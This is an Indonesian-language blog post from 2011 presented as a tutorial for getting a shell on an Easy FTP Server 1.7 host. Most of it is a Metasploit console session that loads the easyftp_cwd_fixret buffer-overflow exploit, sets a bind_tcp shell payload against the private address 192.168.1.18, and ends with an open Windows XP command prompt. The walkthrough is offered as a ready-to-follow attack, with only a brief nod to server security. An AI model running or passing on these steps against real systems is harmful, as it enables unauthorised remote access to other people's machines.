Sabtu, 26 November 2011

Tutorial cara serangan untuk mendapatkan shell di FTP Server

Keamanan suatu aplikasi server yang kita gunakan perlu mendapatkan perhatian, karena jika kita tidak memperhatikan lebih jauh maka komputer kita dapat kebobolan di hack oleh orang lain yang tidak bertanggung jawab menjadi lebih besar.

FTP Server merupakan sebuah server yang memanfaatkan File Transfer Protocol (FTP) untuk keperluan transfer file antar mesin pada jaringan TCP/IP, disini celah keamanannya ada pada aplikasi Easy FTP Server versi 1.7 pada buffer overflow yang dimana kita dapat memanfaatkannya dengan memasukkan input dalam bentuk exploit sehingga data-data yang disimpan melebihi kapasitas buffer memorinya. Intinya dengan proses tersebut maka kita dapat memasukkan berbagai shellcode untuk dijalankan di server, contohnya bind shell.

Disini kita dapat menggunakan Metasploit Framework 3.71 atau lebih tinggi.
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 64 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 64 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf exploit(easyftp_cwd_fixret) > use exploit/windows/ftp/easyftp_cwd_fixret

Kita menggunakan exploit easyftp_cwd_fixret

msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/shell/bind_tcp

Kita memilih payload bind_tcp

PAYLOAD => windows/shell/bind_tcp
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.1.18

Contoh target kita adalah 192.168.1.18

RHOST => 192.168.1.18
msf exploit(easyftp_cwd_fixret) > exploit

Setelah itu tinggal kita ketik exploit seperti diatas lalu enter

[*] Started bind handler
[*] Prepending fixRet…
[*] Adding the payload…
[*] Overwriting part of the payload with target address…
[*] Sending exploit buffer…
[*] Sending stage (240 bytes) to 192.168.1.18
[*] Command shell session 1 opened (192.168.1.10:2598 -> 192.168.1.18:4444) at 2011-07-19 03:32:43 +0700

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\ftp\easyftpsvr-1.7.0.2>

Binggo, anda mendapatkan shell di server FTP Target.

0 komentar:

Posting Komentar

    Blogger news

    Blogroll

    About